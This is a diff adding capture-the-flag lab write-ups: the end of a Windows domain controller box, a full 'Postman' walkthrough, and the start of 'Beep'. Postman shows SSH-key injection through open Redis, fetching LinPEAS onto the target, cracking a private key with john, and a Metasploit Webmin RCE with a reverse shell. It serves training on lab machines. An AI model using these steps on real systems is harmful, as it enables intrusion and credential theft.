+ Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation
+
+ [*] Requesting shares on 10.10.10.161.....
+ [*] Found writable share ADMIN$
+ [*] Uploading file kvZZufbZ.exe
+ [*] Opening SVCManager on 10.10.10.161.....
+ [*] Creating service HFYI on 10.10.10.161.....
+ [*] Starting service HFYI.....
+ [!] Press help for extra shell commands
+ Microsoft Windows [Version 10.0.14393]
+ (c) 2016 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>systeminfo
+
+ Host Name: FOREST
+ OS Name: Microsoft Windows Server 2016 Standard
+ OS Version: 10.0.14393 N/A Build 14393
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Primary Domain Controller
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00376-30821-30176-AA930
+ Original Install Date: 9/18/2019, 10:07:59 AM
+ System Boot Time: 5/24/2021, 9:09:23 AM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 1 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume2
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-08:00) Pacific Time (US & Canada)
+ Total Physical Memory: 2,047 MB
+ Available Physical Memory: 635 MB
+ Virtual Memory: Max Size: 2,431 MB
+ Virtual Memory: Available: 990 MB
+ Virtual Memory: In Use: 1,441 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: htb.local
+ Logon Server: N/A
+ Hotfix(s): 3 Hotfix(s) Installed.
+ [01]: KB3199986
+ [02]: KB4512574
+ [03]: KB4103720
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: Intel(R) 82574L Gigabit Network Connection
+ Connection Name: Ethernet0
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.161
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+ C:\Windows\system32>cd ..
+
+ C:\Windows>cd ..
+
+ C:\>cd Users\Administrator\Desktop
+
+ C:\Users\Administrator\Desktop>type root.txt
+ f0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/39.md b/Easy/39.md
new file mode 100644
index 0000000..83451d5
--- /dev/null
+++ b/Easy/39.md
@@ -0,0 +1,584 @@
+# Postman Writeup
+
+
+
+## Introduction :
+
+Postman is an easy linux box released back in november 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → nmap -p- -T4 10.10.10.160
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:25 CEST
+ Nmap scan report for 10.10.10.160
+ Host is up (0.041s latency).
+ Not shown: 65531 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 80/tcp open http
+ 6379/tcp open redis
+ 10000/tcp open snet-sensor-mgmt
+
+ Nmap done: 1 IP address (1 host up) scanned in 26.48 seconds
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → nmap -sCV -p 22,80,6379,10000 10.10.10.160
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-24 21:26 CEST
+ Nmap scan report for 10.10.10.160
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
+ | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
+ |_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: The Cyber Geek's Personal Website
+ 6379/tcp open redis Redis key-value store 4.0.9
+ 10000/tcp open http MiniServ 1.910 (Webmin httpd)
+ |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 36.79 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up a Redis 4.0.x instance running on port 6379
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → searchsploit redis 4
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation | windows/local/45244.txt
+ Redis - Replication Code Execution (Metasploit) | linux/remote/48272.rb
+ Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) | linux/remote/47195.rb
+ Redis 5.0 - Denial of Service | linux/dos/44908.txt
+ Redis-cli <****5.0 - Buffer Overflow (PoC) | linux/local/44904.py
+ ------------------------------------------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+As you can see, there are a few exploits available for redis 4.0.x and one of them is an unauthenticated command execxution and filewrites. So let's test that with redis-cli:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → sudo apt install redis -y
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [blog/HTB/Easy]
+ → redis-cli -h 10.10.10.160
+ 10.10.10.160:6379> CONFIG GET *
+ 1) "dbfilename"
+ 2) "dump.rdb"
+ 3) "requirepass"
+ 4) ""
+ 5) "masterauth"
+ 6) ""
+ 7) "cluster-announce-ip"
+ 8) ""
+ 9) "unixsocket"
+ 10) ""
+ 11) "logfile"
+ 12) "/var/log/redis/redis-server.log"
+ 13) "pidfile"
+ 14) "/var/run/redis/redis-server.pid"
+ [...]
+
+
+Here we see that the default folder for redis seems to be /var/lib/redis, so we're going to check if the redis user has SSH authentication configured by checking for a .ssh folder:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → redis-cli -h 10.10.10.160
+
+ 10.10.10.160:6379> CONFIG GET dir
+ 1) "dir"
+ 2) "/var/lib/redis"
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/idontexist/
+ (error) ERR Changing directory: No such file or directory
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh/
+ OK
+
+
+
+So here we see that a .ssh folder does exist in redis' home directory, let's write our public SSH key to it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → ssh-keygen -t ed25519
+ Generating public/private ed25519 key pair.
+ Enter file in which to save the key (/home/nothing/.ssh/id_ed25519):
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in /home/nothing/.ssh/id_ed25519
+ Your public key has been saved in /home/nothing/.ssh/id_ed25519.pub
+ The key fingerprint is:
+ SHA256:WUW671jwTAkg4RGKPvDZ4twbg6pWVynYTDS/HaTqbE0 nothing@nowhere
+ The key's randomart image is:
+ +--[ED25519 256]--+
+ | .o=o.. .o |
+ | . +ooo. o |
+ |. . * .o..+ |
+ | + + +.ooo.o . |
+ | * ..oES.o o |
+ | o *o.o * |
+ | = =+ . = |
+ | o .+ + |
+ |= . . . |
+ +----[SHA256]-----+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat ~/.ssh/id_ed25519.pub
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → (echo -e "\n\n";cat ~/.ssh/id_ed25519.pub;echo -e "\n\n") > pubkey.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat pubkey.txt
+
+
+
+ ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → cat pubkey.txt| redis-cli -h 10.10.10.160 -x set ssh_key
+ OK
+
+
+
+Here you can see we made sure that the public key had newline characters on either side, that is because if we didn't, redis would add our pubkey onto another, without jumping to a newline, obviously it wouldn't work, then we proceed:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → redis-cli -h 10.10.10.160
+
+ 10.10.10.160:6379> get ssh_key
+ "\n\n\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere\n\n\n\n"
+
+ 10.10.10.160:6379> CONFIG SET dir /var/lib/redis/.ssh
+ OK
+
+ 10.10.10.160:6379> CONFIG SET dbfilename authorized_keys
+ OK
+
+ 10.10.10.160:6379> save
+ OK
+
+ 10.10.10.160:6379> exit
+
+
+
+Once that's done, simply ssh as the redis user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Postman]
+ → ssh redis@10.10.10.160
+ Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+
+ * Canonical Livepatch is available for installation.
+ - Reduce system reboots and improve kernel security. Activate at:
+ https://ubuntu.com/livepatch
+ Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
+
+ redis@Postman:~$ id
+ uid=107(redis) gid=114(redis) groups=114(redis)
+
+ redis@Postman:~$
+
+
+
+Now that we have a ssh access to the box as the redis user, we're going to enumerate the box, to do so we can use the old fashioned unix-privesc-check or we can use a newer solution called 'LinPEAS', i'm going to use it for the other boxes aswell, so i'll clone the repository in my ~/Tools directory:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
+ → git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
+ Cloning into 'privilege-escalation-awesome-scripts-suite'...
+ remote: Enumerating objects: 5452, done.
+ remote: Counting objects: 100% (239/239), done.
+ remote: Compressing objects: 100% (149/149), done.
+ remote: Total 5452 (delta 139), reused 132 (delta 85), pack-reused 5213
+ Receiving objects: 100% (5452/5452), 18.72 MiB | 3.94 MiB/s, done.
+ Resolving deltas: 100% (3250/3250), done.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/Tools]
+ → cd ~/HTB/Postman
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → sudo updatedb ; locate linpeas.sh
+ [sudo] password for nothing:
+ /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 25 08:52 linpeas.sh
+
+
+
+Now let's transfer the file onto the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+Then download the script onto the box, you can either put it in **/tmp** or **/dev/shm** :
+
+
+ redis@Postman:~$ wget http://10.10.14.13:9090/linpeas.sh -O /dev/shm/peas.sh
+ --2021-05-25 08:03:20-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/dev/shm/peas.sh’
+
+ /dev/shm/peas.sh 100%[=================================================================================================================================================>] 333.85K 700KB/s in 0.5s
+
+ 2021-05-25 08:03:20 (700 KB/s) - ‘/dev/shm/peas.sh’ saved [341863/341863]
+
+ redis@Postman:~$ chmod +x /dev/shm/peas.sh
+ redis@Postman:~$ /dev/shm/peas.sh
+
+
+
+` 
+
+linpeas.sh's output is quite massive so here's the important parts, if you're using tmux you can search for the output itself like this **CTRL+B PgUp, CTRL+S 'ssh files'** :
+
+
+
+So Peas found an id_rsa.bak file in the **/opt** folder:
+
+
+ redis@Postman:~$ cat /opt/id_rsa.bak
+ -----BEGIN RSA PRIVATE KEY-----
+ Proc-Type: 4,ENCRYPTED
+ DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
+
+ JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
+ cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
+ 7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
+ cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
+ 1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
+ EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
+ UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
+ Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
+ t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
+ 5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
+ P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
+ jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
+ SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
+ l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
+ 0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
+ S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
+ hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
+ Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
+ XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
+ b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
+ WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
+ KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
+ npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
+ VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
+ X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
+ -----END RSA PRIVATE KEY-----
+
+
+As the title suggests, this is an encrypted private key file, so let's crack it with rockyou.txt using john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → sudo gunzip rockyou.txt.gz
+ [sudo] password for nothing:
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → ls -lash rockyou.txt
+ 134M -rw-r--r-- 1 root root 134M Jul 17 2019 rockyou.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [/usr/share/wordlists]
+ → cd ~/HTB/Postman
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → vim pkey
+
+
+
+Then we convert the private key to a hash with ssh2john.py and crack it with john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → locate ssh2john.py
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → /usr/share/john/ssh2john.py pkey > hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → john hash --fork=4 -w=/usr/share/wordlists/rockyou.txt
+ Created directory: /home/nothing/.john
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
+ Cost 2 (iteration count) is 2 for all loaded hashes
+ Node numbers 1-4 of 4 (fork)
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ computer2008 (pkey)
+ 2 1g 0:00:00:05 DONE (2021-05-25 09:11) 0.1848g/s 662739p/s 662739c/s 662739C/sabygurl69
+ 3 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 661514p/s 661514c/s 661514C/sa6_123
+ 4 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660302p/s 660302c/s 660302C/s *7¡Vamos!
+ 1 0g 0:00:00:05 DONE (2021-05-25 09:11) 0g/s 660299p/s 660299c/s 660299C/sie168
+ Waiting for 3 children to terminate
+ Session completed
+
+
+
+And we found the password computer2008. but the question is for which user is this for ? We can look at it from either /home or /etc/passwd:
+
+
+ redis@Postman:~$ ls -lash /home
+ total 12K
+ 4.0K drwxr-xr-x 3 root root 4.0K Sep 11 2019 .
+ 4.0K drwxr-xr-x 22 root root 4.0K Sep 30 2020 ..
+ 4.0K drwxr-xr-x 6 Matt Matt 4.0K Sep 11 2019 Matt
+
+ redis@Postman:~$ cat /etc/passwd | grep bash
+ root:x:0:0:root:/root:/bin/bash
+ Matt:x:1000:1000:,,,:/home/Matt:/bin/bash
+ redis:x:107:114::/var/lib/redis:/bin/bash
+
+
+
+Here we see that the Matt user has a home directory, and a valid bash shell. So let's get to the user using sudo:
+
+
+ redis@Postman:~$ su Matt
+ Password:
+ Matt@Postman:/var/lib/redis$ id
+ uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
+ Matt@Postman:/var/lib/redis$ cd ~
+ Matt@Postman:~$ cat user.txt
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the Matt user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now we need to find a way to get root on this box, first instinct tells us to check sudo -l:
+
+
+ Matt@Postman:~$ sudo -l
+ [sudo] password for Matt:
+ Sorry, user Matt may not run sudo on Postman.
+
+
+
+But that doesn't help us. Nor does anything else on this user, this is a bit of a rabbithole. Let's move onto the next thing our nmap scan picked up, the webmin service on port 10000
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → curl http://10.10.10.160:10000/
+
+
+ # Error - Document follows
+
+
+
+
+ This web server is running in SSL mode. Try the URL instead.
+
+
+
+
+
+
+So let's check it in https instead, we login as the Matt user with his password computer2008:
+
+
+
+
+
+
+ Matt@Postman:~$ cd /etc/webmin/
+
+ Matt@Postman:/etc/webmin$ cat version
+ 1.910
+
+
+
+So here's our hint, this is an outdated webmin version, so let's check what exploits we can use on it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → searchsploit webmin 1.9
+ ------------------------------------------------------ ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------ ---------------------------------
+ Webmin 1.900 - Remote Command Execution (Metasploit) | cgi/remote/46201.rb
+ Webmin 1.910 - 'Package Updates' Remote Command Execu | linux/remote/46984.rb
+ Webmin 1.920 - Remote Code Execution | linux/webapps/47293.sh
+ Webmin 1.920 - Unauthenticated Remote Code Execution | linux/remote/47230.rb
+ Webmin 1.962 - 'Package Updates' Escape Bypass RCE (M | linux/webapps/49318.rb
+ Webmin <****1.290 / Usermin <****1.220 - Arbitrary File Dis | multiple/remote/1997.php
+ Webmin < ****1.290 / Usermin < ****1.220 - Arbitrary File Dis | multiple/remote/2017.pl
+ Webmin < ****1.920 - 'rpc.cgi' Remote Code Execution (Met | linux/webapps/47330.rb
+ ------------------------------------------------------ ---------------------------------
+ Shellcodes: No Results
+
+So basically we can pick one of these, or we can make use of this proof of concept [here](https://github.com/KyleV98/Webmin-1.910-Exploit):
+
+TLDR we can get a RCE using burpsuite because the package updater is vulnerable to command injections through the **u** POST parameter. If you click on **System** on the panel to the left, then click on **Software Package Updates** , you can turn on Burpsuite to intercept, and then just click **Update Selected Packages:** So let's use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Postman]
+ → msfconsole
+
+
+ Metasploit Park, System Security Interface
+ Version 4.0.5, Alpha E
+ Ready...
+ > access security
+ access: PERMISSION DENIED.
+ > access security grid
+ access: PERMISSION DENIED.
+ > access main security grid
+ access: PERMISSION DENIED....and...
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+ YOU DIDN'T SAY THE MAGIC WORD!
+
+
+ =[ metasploit v6.0.44-dev ]
+ + -- --=[ 2131 exploits - 1139 auxiliary - 363 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: You can use help to view all
+ available commands
+
+ msf6 > search webmin
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution
+ 1 auxiliary/admin/webmin/file_disclosure 2006-06-30 normal No Webmin File Disclosure
+ 2 exploit/linux/http/webmin_packageup_rce 2019-05-16 excellent Yes Webmin Package Updates Remote Command Execution
+ 3 exploit/unix/webapp/webmin_upload_exec 2019-01-17 excellent Yes Webmin Upload Authenticated RCE
+ 4 auxiliary/admin/webmin/edit_html_fileaccess 2012-09-06 normal No Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
+ 5 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
+
+
+ Interact with a module by name or index. For example info 5, use 5 or use exploit/linux/http/webmin_backdoor
+
+ msf6 > use 2
+
+
+
+We're going to use the RCE module:
+
+
+ msf6 > use 2
+ [*] Using configured payload cmd/unix/reverse_perl
+ msf6 exploit(linux/http/webmin_packageup_rce) > show options
+
+ Module options (exploit/linux/http/webmin_packageup_rce):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PASSWORD yes Webmin Password
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 10000 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TARGETURI / yes Base path for Webmin application
+ USERNAME yes Webmin Username
+ VHOST no HTTP server virtual host
+
+
+ Payload options (cmd/unix/reverse_perl):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Webmin <= 1.910
+
+
+
+We need to set the LHOST, RHOST, SSL, USERNAME and PASSWORD options before running the exploit:
+
+
+ msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST tun0
+ LHOST => 10.10.14.13
+ msf6 exploit(linux/http/webmin_packageup_rce) > set RHOST 10.10.10.160
+ RHOST => 10.10.10.160
+ msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
+ [!] Changing the SSL option's value may require changing RPORT!
+ SSL => true
+ msf6 exploit(linux/http/webmin_packageup_rce) > run
+
+ [-] Exploit failed: One or more options failed to validate: USERNAME, PASSWORD.
+ [*] Exploit completed, but no session was created.
+ msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
+ USERNAME => Matt
+ msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
+ PASSWORD => computer2008
+ msf6 exploit(linux/http/webmin_packageup_rce) > run
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [+] Session cookie: 4cc0c13f51b9e777f7a9e0cdc9a93277
+ [*] Attempting to execute the payload...
+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.160:49564) at 2021-05-25 09:56:39 +0200
+
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ cat /root/root.txt
+ 3aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/4.md b/Easy/4.md
new file mode 100644
index 0000000..51af50c
--- /dev/null
+++ b/Easy/4.md
@@ -0,0 +1,308 @@
+# Beep Writeup
+
+
+
+## Introduction :
+
+Beep is an easy Linux box which was released back in March 2017. It features multiple Local File Inclusion Vulnerabilities.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions on the ports that we might find interesting.
+
+
+ λ nihilist [~] → nmap 10.10.10.7
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 11:47 CET
+ Nmap scan report for 10.10.10.7
+ Host is up (0.075s latency).
+ Not shown: 988 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 25/tcp open smtp
+ 80/tcp open http
+ 110/tcp open pop3
+ 111/tcp open rpcbind
+ 143/tcp open imap
+ 443/tcp open https
+ 993/tcp open imaps
+ 995/tcp open pop3s
+ 3306/tcp open mysql
+ 4445/tcp open upnotifyp
+ 10000/tcp open snet-sensor-mgmt
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds
+
+
+
+There are alot of opened ports on this machine, Let's use the -sC and -sV flags on the ports 80 and 10000 to get a few more details.
+
+
+ λ nihilist [~] → nmap -sC -sV 10.10.10.7 -p80,10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-09 11:50 CET
+ Nmap scan report for 10.10.10.7
+ Host is up (0.071s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http Apache httpd 2.2.3
+ |_http-server-header: Apache/2.2.3 (CentOS)
+ |_http-title: Did not follow redirect to https://10.10.10.7/
+ |_https-redirect: ERROR: Script execution failed (use -d to debug)
+ 10000/tcp open http MiniServ 1.570 (Webmin httpd)
+ |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
+ Service Info: Host: 127.0.0.1
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 37.64 seconds
+
+
+looking at the results, we see that we are dealing with Miniserv 1.570 and Apache 2.2.3 running on CentOS. Let's fire up our web browser to see what we are dealing with, at both the 80 and 10000th port.
+
+## **Part 2 : Getting User Access**
+
+We see that port 80 is giving us Elastix login page,
+
+
+
+As for the port 10000, it is giving us a webmin login page as it was mentionned in the previous nmap result.
+
+ We will now check for available exploits for both the Elastix and the Webmin Services. We will be using the **Searchsploit** command for that matter :
+
+
+ λ nihilist [~] → searchsploit webmin
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal | exploits/cgi/webapps/23535.txt
+ Webmin - Brute Force / Command Execution | exploits/multiple/remote/705.pl
+ Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing | exploits/linux/remote/22275.pl
+ Webmin 0.x - 'RPC' Privilege Escalation | exploits/linux/remote/21765.pl
+ Webmin 0.x - Code Input Validation | exploits/linux/local/21348.txt
+ Webmin 1.5 - Brute Force / Command Execution | exploits/multiple/remote/746.pl
+ Webmin 1.5 - Web Brute Force (CGI) | exploits/multiple/remote/745.pl
